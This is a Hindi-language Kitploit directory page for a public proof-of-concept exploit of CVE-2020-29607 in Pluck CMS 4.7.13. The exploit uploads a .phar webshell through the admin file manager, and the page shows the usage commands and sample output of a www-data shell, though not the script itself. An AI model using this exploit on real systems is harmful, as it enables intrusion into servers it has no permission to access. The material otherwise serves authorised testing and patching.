Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2020-29607-Pluck-CMS-4.7.13-Authenticated-File-Upload-RCE-PoC — Pluck CMS 4.7.13 से पहले के संस्करणों में प्रमाणित रिमोट कोड निष्पादन। | Kitploit
उपकरण/GitHubGitHub/estebanzarate/cve-2020-29607-pluck-cms-4.7.13-authenticated-file-upload-rce-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंट
GitHubestebanzarate/cve-2020-29607-pluck-cms-4.7.13-authenticated-file-upload-rce-poc

CVE-2020-29607-Pluck-CMS-4.7.13-Authenticated-File-Upload-RCE-PoC

Pluck CMS 4.7.13 से पहले के संस्करणों में प्रमाणित रिमोट कोड निष्पादन।

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
15 महीने पहलेअभी तक समीक्षित नहीं

CVE-2020-29607 — Pluck CMS <= 4.7.13 प्रमाणित फ़ाइल अपलोड RCE (PoC)

Pluck CMS 4.7.13 से पहले के संस्करण में प्रमाणित दूरस्थ कोड निष्पादन। एडमिन फ़ाइल प्रबंधक (admin.php?action=files) फ़ाइल एक्सटेंशन को मान्य नहीं करता, जिससे .phar फ़ाइलें अपलोड की जा सकती हैं जिन्हें Apache PHP के रूप में निष्पादित करता है। इस एंडपॉइंट के माध्यम से वेबशेल अपलोड करने से वेब सर्वर उपयोगकर्ता के रूप में RCE होता है।


यह कैसे काम करता है

  1. प्रदान किए गए एडमिन पासवर्ड का उपयोग करके प्रमाणित होता है।
  2. एडमिन फ़ाइल प्रबंधक के माध्यम से shell.phar के रूप में PHP वेबशेल अपलोड करता है।
  3. शेल का अनुरोध करके और id चलाकर निष्पादन की पुष्टि करता है।
  4. अपलोड की गई वेबशेल के विरुद्ध एक इंटरैक्टिव कमांड लूप खोलता है।

आवश्यकताएँ

  • Python 3
  • निर्भरताएँ स्थापित करें:
root@kitploit:~
python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit

उपयोग

root@kitploit:~
# Pluck at root
python3 exploit.py -u http://TARGET -p ADMIN_PASSWORD

# Pluck in a subdirectory
python3 exploit.py -u http://TARGET -p ADMIN_PASSWORD --path /pluck

उदाहरण:

root@kitploit:~
$ python3 exploit.py -u http://10.10.10.10 -p admin123
[*] Logging in...
[+] Logged in
[*] Uploading webshell...
[+] Webshell uploaded
[*] Shell URL: http://10.10.10.10/files/shell.phar
[+] Target is vulnerable! Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Shell opened. Type 'exit' or Ctrl+C to quit.

Shell> whoami
www-data

संदर्भ

  • CVE-2020-29607
  • EDB-49909
  • Original PoC by Ron Jost (Hacker5preme)

श्रेय

  • खोज और मूल शोषण: Ron Jost (Hacker5preme)
  • Python 3 पोर्ट और इंटरैक्टिव शेल: Esteban Zárate
टूल डाउनलोड करें